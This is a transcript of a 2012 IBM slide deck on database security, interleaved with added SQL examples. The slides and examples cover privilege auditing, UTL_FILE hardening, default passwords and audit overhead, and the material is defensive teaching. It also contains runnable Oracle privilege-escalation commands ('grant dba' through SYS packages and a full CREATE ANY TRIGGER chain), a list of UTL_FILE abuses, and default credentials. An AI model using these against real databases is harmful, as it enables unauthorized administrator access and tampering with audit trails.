Do you know where your data is, and who has access to it? Ron Ben Natan, IBM US
DESCRIPTION
Presentation from Smarter Business 2012
TRANSCRIPT
![Page 1: Do you know where your data is, and who has access to it? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/1.jpg)
© 2012 IBM Corporation
Database Security and Compliance
Ron Ben-Natan, IBM Distinguished Engineer
CTO for Data Security, Compliance and Optimization
![Page 2: Do you know where your data is, and who has access to it? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/2.jpg)
Database Security in the Forefront
2
Data loss prevention
Compliance requirements
Mature best practices
7 Steps
• Hardening
• Assessing
• Classifying
• Monitoring
• Auditing
• Enforcing
• Encrypting
![Page 3: Do you know where your data is, and who has access to it? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/3.jpg)
Which types of information assets are compromised?
3
![Page 4: Do you know where your data is, and who has access to it? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/4.jpg)
The “Unknown” Factor
4
![Page 5: Do you know where your data is, and who has access to it? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/5.jpg)
Discovery & Classification
5
Scoping
• Infrastructure: database discovery (databases, hosts, applications)
• Requirements/initiatives: SOX, PCI, DPD, Basel II, GLBA, ... security breaches, separation of duties, ...
• Data classification
These feed the scope & technical requirements, which in turn drive Assessing, Auditing and Protecting.
![Page 6: Do you know where your data is, and who has access to it? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/6.jpg)
Example 1 - ANY System Privileges
6
Oracle has over 100 system privileges. Nearly every ANY system privilege can be used by an attacker to assume DBA privileges:
• EXECUTE ANY PROCEDURE: there are many procedures within the SYS schema that run with definer rights, so if I can run them I can assign myself privileges:
  exec sys.dbms_repcat_sql_util.do_sql('grant dba to ronb', true);
  exec sys.dbms_streams_rpc.execute_stmt('grant dba to ronb');
  exec sys.ltadm.executesql('grant dba to ronb');
• CREATE ANY VIEW: I create a procedure that gives me DBA privileges, running with invoker rights. I create a view in the SYSTEM schema that runs the procedure. I convince a DBA to access the view.
• CREATE ANY TRIGGER: I create a procedure that grants me DBA, running with invoker rights. I pick a user with DBA privileges, and a table in that user's schema on which PUBLIC has a DML privilege (e.g. INSERT; DML triggers fire on INSERT, UPDATE and DELETE, not on SELECT). I define a trigger for that DML event on the table that calls the procedure, then perform the DML using the PUBLIC privilege. The trigger body runs as the schema owner, so I now have DBA privileges!
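The CREATE ANY TRIGGER chain above written out, followed by the checks a DBA would run to find who is exposed to it. This is an added example, not code from the deck: the low-privileged user RONB, the DBA-owned table SYSTEM.SCRATCH (assumed to have INSERT granted to PUBLIC) and the procedure and trigger names are all hypothetical.

```sql
-- Added example; RONB, SYSTEM.SCRATCH and all object names are hypothetical.

-- Step 1 (as RONB): an invoker-rights procedure that grants DBA to RONB.
-- GRANT is DDL, which a trigger body cannot issue directly (ORA-04092),
-- so the procedure runs as an autonomous transaction.
CREATE OR REPLACE PROCEDURE ronb.grant_me AUTHID CURRENT_USER AS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  EXECUTE IMMEDIATE 'GRANT DBA TO ronb';
  COMMIT;
END;
/
GRANT EXECUTE ON ronb.grant_me TO PUBLIC;

-- Step 2 (as RONB, holding CREATE ANY TRIGGER): a trigger in the SYSTEM schema.
-- The trigger body executes with the trigger owner's rights, so inside GRANT_ME
-- the "current user" is SYSTEM and the grant succeeds.
CREATE OR REPLACE TRIGGER system.scratch_bi
  BEFORE INSERT ON system.scratch
BEGIN
  ronb.grant_me;
END;
/

-- Step 3: fire it with the privilege PUBLIC already has. A SELECT would not do:
-- DML triggers only fire on INSERT, UPDATE and DELETE.
INSERT INTO system.scratch (id) VALUES (1);
-- RONB is now a DBA (visible after reconnecting).

-- Detection, run as a DBA.
-- 1. Every ANY system privilege held directly by a user or by a role, other than Oracle's own.
SELECT grantee, privilege, admin_option
FROM   dba_sys_privs
WHERE  privilege LIKE '%ANY%'
AND    grantee NOT IN ('SYS', 'SYSTEM', 'DBA', 'IMP_FULL_DATABASE', 'EXP_FULL_DATABASE')
ORDER  BY grantee, privilege;

-- 2. Who can execute the definer-rights SYS packages named on the slide.
SELECT grantee, table_name, privilege
FROM   dba_tab_privs
WHERE  owner = 'SYS'
AND    table_name IN ('DBMS_REPCAT_SQL_UTIL', 'DBMS_STREAMS_RPC', 'LTADM')
ORDER  BY table_name, grantee;

-- 3. Triggers living in SYS or SYSTEM; anything you did not put there is a red flag.
SELECT owner, trigger_name, triggering_event, table_owner, table_name, status
FROM   dba_triggers
WHERE  owner IN ('SYS', 'SYSTEM')
ORDER  BY trigger_name;

-- Remediation: take the ANY privilege away rather than trusting it to be used well.
REVOKE CREATE ANY TRIGGER   FROM ronb;
REVOKE EXECUTE ANY PROCEDURE FROM ronb;
```

The second query matters because EXECUTE ANY PROCEDURE is not the only route to those packages; a direct object grant, or a grant to PUBLIC, gives the same result. Oracle Database 12c added the INHERIT PRIVILEGES privilege specifically to stop a definer-rights unit from lending its privileges to someone else's invoker-rights procedure in this way, but it is granted to PUBLIC by default for compatibility, so the checks above are still worth running.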
![Page 7: Do you know where your data is, and who has access to it? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/7.jpg)
Example 2 – UTL_FILE
7
DECLARE
  fh UTL_FILE.FILE_TYPE;                         -- file handle
BEGIN
  fh := utl_file.fopen(<dir>, <file name>, 'w');  -- directory and file name as given on the slide
  utl_file.put_line(fh, 'abcdefgh', true);
  utl_file.fclose(fh);
END;
/
The ability to write files to the OS is a very dangerous thing:
• Runs with the privileges of the database instance owner (the OS account the oracle processes run as)
• Can be used to delete audit files
• Can be used to delete or corrupt a data file, including the SYSTEM tablespace
• Can be used to change config files
• Can be used to write a .rhosts file to allow access to the OS
• Can be used to write to .cshrc or .login for the oracle OS account
• Can be used to write a login.sql or glogin.sql file to cause a SQL command to be called with the privileges of a DBA
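The inventory and hardening steps that follow from the slide, as an added example rather than anything from the deck. It targets Oracle 10g/11g, where EXECUTE on UTL_FILE is granted to PUBLIC out of the box; the application schema BATCH_APP and the directory path are assumptions.

```sql
-- Added example; BATCH_APP, BATCH_OUT and the path are hypothetical.

-- 1. Who can call UTL_FILE at all? By default the answer includes PUBLIC.
SELECT grantee, privilege
FROM   dba_tab_privs
WHERE  owner = 'SYS' AND table_name = 'UTL_FILE';

-- 2. Where can it write? First the legacy UTL_FILE_DIR parameter.
--    A value of '*' means any path the instance owner can write to, which covers
--    $ORACLE_HOME, audit_file_dest and the data files themselves.
SELECT name, value FROM v$parameter WHERE name = 'utl_file_dir';

--    Then DIRECTORY objects, together with who may read or write through them.
SELECT d.directory_name, d.directory_path, p.grantee, p.privilege
FROM   dba_directories d
JOIN   dba_tab_privs   p ON p.table_name = d.directory_name AND p.owner = 'SYS'
WHERE  p.privilege IN ('READ', 'WRITE')
ORDER  BY d.directory_name, p.grantee;

-- 3. Hardening: remove the blanket grant, re-grant only to the schema that needs it,
--    and give that schema a directory well away from $ORACLE_HOME, the audit trail
--    and the data files.
REVOKE EXECUTE ON sys.utl_file FROM PUBLIC;
GRANT  EXECUTE ON sys.utl_file TO batch_app;
CREATE OR REPLACE DIRECTORY batch_out AS '/u01/app/batch/out';
GRANT  WRITE ON DIRECTORY batch_out TO batch_app;

-- UTL_FILE_DIR is a static parameter: clear it in the spfile and restart the instance.
ALTER SYSTEM SET utl_file_dir = '' SCOPE = SPFILE;
```

After revoking from PUBLIC, check for packages owned by application schemas that wrap UTL_FILE and are themselves granted to PUBLIC; they hand the same capability back out. UTL_FILE_DIR was removed entirely in Oracle Database 18c, so on current releases only the DIRECTORY-object query applies.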
![Page 8: Do you know where your data is, and who has access to it? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/8.jpg)
Assessing & Securing
8
Assessing
• Configuration assessment
• Behavioral assessment
• Vulnerability assessment
Security recommendations lead to a secure configuration; the scope & technical requirements drive change tracking, a CAS proven configuration, and compliance.
![Page 9: Do you know where your data is, and who has access to it? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/9.jpg)
“Though some movie plots would have us believe otherwise, cyber attacks in the real world rarely involve Mission Impossible-like scenarios. Quite the opposite, in fact.”
9
Complexity
![Page 10: Do you know where your data is, and who has access to it? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/10.jpg)
Example 3 - Passwords
10
Spida – Microsoft SQL Server
• Empty sa password
• xp_cmdshell
• Propagation
• Made it to 4th place in the SANS "Top Ten"
Default and hard-coded credentials (APPS/APPS, scott/tiger, sa) sitting in plaintext configuration files:
weblogic.jdbc.connectionPool.eng=\
  url=jdbc:weblogic:oracle,\
  driver=weblogic.jdbc.oci.Driver,\
  loginDelaySecs=2,\
  initialCapacity=50,\
  capacityIncrement=10,\
  maxCapacity=100,\
  props=user=scott,password=tiger,server=ORCL
<ias-resources>
  <jdbc>
    <database>ORCL</database>
    <datasource>ORCL</datasource>
    <username>scott</username>
    <password>tiger</password>
    <driver-type>ORACLE_OCI</driver-type>
  </jdbc>
</ias-resources>
Provider=SQLOLEDB;Data Source=192.168.1.32;Initial Catalog=Northwind;User ID=sa;Password=sapwd;
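The checks that catch the two openings on this slide, as an added example that is not part of the deck: blank or trivial SQL Server passwords and an enabled xp_cmdshell (Spida's entry and payload), and Oracle accounts still on their default password (the scott/tiger case in the configuration files). The T-SQL part assumes SQL Server 2008 or later, where PWDCOMPARE is documented; the Oracle part assumes 11g, which introduced DBA_USERS_WITH_DEFPWD.

```sql
-- Added example; the replacement password below is a placeholder to be generated, not a value to use.

-- SQL Server: logins whose password is empty or equal to the login name.
SELECT name, is_disabled
FROM   sys.sql_logins
WHERE  PWDCOMPARE('',   password_hash) = 1
   OR  PWDCOMPARE(name, password_hash) = 1;

-- SQL Server: is xp_cmdshell enabled? It has been off by default since SQL Server 2005.
SELECT name, value_in_use
FROM   sys.configurations
WHERE  name IN ('xp_cmdshell', 'show advanced options');

-- SQL Server hardening: shut the shell, disable sa, and give applications their own
-- least-privilege logins instead of sa in a connection string.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
ALTER LOGIN sa WITH PASSWORD = '<long random password>';
ALTER LOGIN sa DISABLE;

-- Oracle 11g: open accounts that still have their well-known default password
-- (SCOTT/tiger, the sample schemas, and on E-Business Suite systems APPS/APPS).
SELECT d.username, u.account_status
FROM   dba_users_with_defpwd d
JOIN   dba_users u ON u.username = d.username
WHERE  u.account_status = 'OPEN'
ORDER  BY d.username;

-- Oracle: lock what is not needed; rotate what is.
ALTER USER scott ACCOUNT LOCK PASSWORD EXPIRE;
```

The configuration-file side of the problem is not fixed in the database: the credentials shown on the slide need to move out of the property, XML and connection-string files into the application server's credential store, and the scott/tiger and sa accounts they reference should be disabled so that a stale copy of the file is worthless.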
![Page 11: Do you know where your data is, and who has access to it? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/11.jpg)
Example 4 - Buffer Overflow Attacks
11
Sapphire worm / SQL Slammer: a "zero-day attack" in name only. The stack overflow it used in the SQL Server 2000 Resolution Service (UDP 1434) had been fixed by MS02-039 six months before the worm appeared in January 2003; it spread because the patch had not been applied.
![Page 12: Do you know where your data is, and who has access to it? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/12.jpg)
Monitoring & Auditing
12
The scope & technical requirements define the auditing policy; the policy produces the audit trails, which support audit compliance and investigation.
• Privileged user monitoring & auditing
• Application monitoring
• Data access investigation
![Page 13: Do you know where your data is, and who has access to it? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/13.jpg)
Compliance – Many Regulations – Internal & External
13
![Page 14: Do you know where your data is, and who has access to it? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/14.jpg)
Breach Discovery
14
![Page 15: Do you know where your data is, and who has access to it? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/15.jpg)
15
![Page 16: Do you know where your data is, and who has access to it? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/16.jpg)
More Oracle Performance Tests
16
Sun E6500, 28 CPUs, 28 GB; 100 concurrent connections
Each doing inserts (real application table, with indexes etc.); 100 ms delay between each insert
![Page 17: Do you know where your data is, and who has access to it? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/17.jpg)
Before Any Auditing
17
Throughput – approximately 19,000 inserts per minute
last pid: 21715;  load averages:  7.27,  4.66,  3.41    10:29:02
271 processes: 269 sleeping, 2 on cpu
CPU states: 66.3% idle, 25.3% user, 2.6% kernel, 5.8% iowait, 0.0% swap
Memory: 26G real, 20G free, 4885M swap in use, 32G swap free

  PID USERNAME LWP PRI NICE  SIZE  RES STATE  TIME   CPU COMMAND
15044 oracle10  12  49    0 2137M 965M sleep  1:17 0.34% oracle
20904 oracle10   1  59    0 2123M 970M sleep  0:15 0.31% oracle
20773 oracle10   1  39    0 2124M 971M sleep  0:16 0.31% oracle
20932 oracle10   1  59    0 2123M 970M sleep  0:14 0.31% oracle
21008 oracle10   1  59    0 2123M 971M sleep  0:13 0.31% oracle
20946 oracle10   1  59    0 2123M 971M sleep  0:13 0.31% oracle
20789 oracle10   1  59    0 2123M 970M sleep  0:16 0.30% oracle
20873 oracle10   1  59    0 2123M 971M sleep  0:15 0.30% oracle
20958 oracle10   1  54    0 2123M 971M sleep  0:13 0.30% oracle
21004 oracle10   1  59    0 2123M 970M sleep  0:13 0.30% oracle
20795 oracle10   1  59    0 2123M 970M sleep  0:15 0.30% oracle
21002 oracle10   1  59    0 2123M 971M sleep  0:13 0.30% oracle
20867 oracle10   1  53    0 2124M 972M sleep  0:15 0.29% oracle
![Page 18: Do you know where your data is, and who has access to it? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/18.jpg)
Oracle with Standard Auditing
18
Throughput – approximately 13,000 inserts per minute: a 30% drop in throughput, and the load average almost doubled
last pid: 7622;  load averages: 14.51,  9.90,  8.72    11:32:32
271 processes: 269 sleeping, 2 on cpu
CPU states: 28.2% idle, 66.5% user, 3.0% kernel, 2.3% iowait, 0.0% swap
Memory: 26G real, 19G free, 4930M swap in use, 32G swap free

  PID USERNAME LWP PRI NICE  SIZE   RES STATE  TIME   CPU COMMAND
 4036 oracle10   1  59    0 2124M 1239M sleep  1:13 0.65% oracle
 4082 oracle10   1  59    0 2124M 1239M sleep  1:12 0.65% oracle
 4086 oracle10   1  59    0 2124M 1239M sleep  1:12 0.65% oracle
 4055 oracle10   1  55    0 2124M 1239M sleep  1:13 0.64% oracle
 4034 oracle10   1  59    0 2124M 1239M sleep  1:12 0.64% oracle
 4139 oracle10   1  59    0 2124M 1239M sleep  1:12 0.64% oracle
 4174 oracle10   1  53    0 2124M 1239M sleep  1:11 0.64% oracle
 4162 oracle10   1  59    0 2124M 1239M sleep  1:11 0.64% oracle
 3927 oracle10   1  35    0 2124M 1239M sleep  1:09 0.64% oracle
 4078 oracle10   1  51    0 2124M 1239M sleep  1:09 0.63% oracle
 4010 oracle10   1  59    0 2124M 1239M sleep  1:12 0.61% oracle
 3947 oracle10   1  59    0 2124M 1239M sleep  1:12 0.61% oracle
 3939 oracle10   1  23    0 2124M 1239M sleep  1:13 0.61% oracle
 4119 oracle10   1  59    0 2124M 1239M sleep  1:10 0.61% oracle
 4020 oracle10   1  41    0 2124M 1239M sleep  1:11 0.60% oracle
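The deck does not say which audit options were switched on for this run. As an added example, not the benchmark's configuration, this is how Oracle standard auditing is enabled for an insert workload on one table and how the trail is read back; the table APP.ORDERS and the choice of DB,EXTENDED and BY ACCESS are assumptions.

```sql
-- Added example; APP.ORDERS and the audit settings are assumptions, not the deck's setup.

-- Standard auditing writes nothing until AUDIT_TRAIL is set. It is a static parameter,
-- so the change goes to the spfile and takes effect at the next restart.
-- EXTENDED keeps the statement text, which is what an investigator wants and what costs space.
ALTER SYSTEM SET audit_trail = DB, EXTENDED SCOPE = SPFILE;

-- Audit every insert on the table. BY ACCESS writes one record per statement,
-- which is the setting that produces the per-insert overhead measured above;
-- BY SESSION collapses repeated actions in one session into a single record.
AUDIT INSERT ON app.orders BY ACCESS;

-- Confirm what is in force ('A/A' in the INS column = audited by access, success and failure).
SELECT owner, object_name, ins
FROM   dba_obj_audit_opts
WHERE  owner = 'APP';

-- Read the trail: who inserted, from which host and OS account, when, and the statement.
SELECT username, os_username, userhost, timestamp, action_name, sql_text
FROM   dba_audit_trail
WHERE  owner = 'APP' AND obj_name = 'ORDERS' AND action_name = 'INSERT'
ORDER  BY timestamp DESC;

-- The trail itself lives in SYS.AUD$ in the SYSTEM tablespace unless relocated with
-- DBMS_AUDIT_MGMT; at 13,000 audited inserts a minute its growth needs watching.
SELECT COUNT(*) FROM sys.aud$;
```

Two properties of this trail drive the next slide: it costs the database the CPU shown above, and it is owned by SYS, so a DBA, the very user whose actions most need recording, can truncate or edit it. That is the separation-of-duties argument for an audit trail the database does not hold.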
![Page 19: Do you know where your data is, and who has access to it? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/19.jpg)
Database Activity Monitoring - DAM
19
• Other reasons to look beyond native auditing: heterogeneous support; easier to deploy and manage; IPC interception to avoid impact on the database; functionality/maturity
• Security and auditing: assessments, policies, change management, audit (as opposed to auditing)
• Automation: compliance packages
• Independence of the audit trail: separation of duties
• Allows security functions such as prevention and redaction
![Page 20: Do you know where your data is, and who has access to it? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/20.jpg)
Protecting
20
Security monitoring & data protection: the scope & technical requirements drive monitoring & anomaly detection, which surfaces violations & incidents for remediation.
• Privileged user access control
• Data access protection
• Data extrusion protection
• Access compliance
![Page 21: Do you know where your data is, and who has access to it? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/21.jpg)
IBM Guardium - Addressing the Full Lifecycle
21
![Page 22: Do you know where your data is, and who has access to it? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/22.jpg)
Scalable Multi-Tier Architecture
22
• Host-based probe (S-TAP) on the database servers in Data Center 1 and Data Center 2, including IBM System z
• Data-level access control (S-GATE)
• A Collector per data center, reporting to a Central Policy Manager & Audit Repository
• Integration with LDAP/AD, IAM, change management, SIEM, archiving, etc.
• Optim for development, test & training
![Page 23: Do you know where your data is, and who has access to it? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/23.jpg)
Thank you!
23